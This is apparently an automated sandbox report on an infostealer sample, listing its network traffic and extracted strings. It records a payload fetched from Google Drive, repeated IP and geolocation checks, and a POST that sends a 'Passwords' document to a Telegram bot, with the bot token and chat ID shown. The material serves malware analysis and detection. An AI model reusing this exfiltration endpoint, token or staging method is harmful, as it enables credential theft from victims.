            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49921 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3195ed612844Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: b5BQbAhwVD.exe, 00000003.00000002.3389482008.0000000036152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/3
            Source: b5BQbAhwVD.exe, 00000003.00000002.3389482008.0000000036152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/K
            Source: b5BQbAhwVD.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A4A000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.000000003396B000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033957000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033D06000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033A2B000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033C9E000.00000004.00000800.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgra
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.0000000033BC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegramLR
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-40f1-ac21-573d1d5ce43f
            Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.00000000031D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/g
            Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI
            Source: b5BQbAhwVD.exe, 00000003.00000003.2509453504.0000000003241000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2476161231.0000000003248000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2509525856.0000000003246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003211000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download
            Source: b5BQbAhwVD.exe, 00000003.00000003.2476161231.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download(
            Source: b5BQbAhwVD.exe, 00000003.00000002.3365100943.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download8
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: b5BQbAhwVD.exe, 00000003.00000002.3386208484.00000000338C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189es
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: b5BQbAhwVD.exe, 00000003.00000003.2469426285.0000000003249000.00000004.00000020.00020000.00000000.sdmp, b5BQbAhwVD.exe, 00000003.00000003.2469341565.0000000003249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
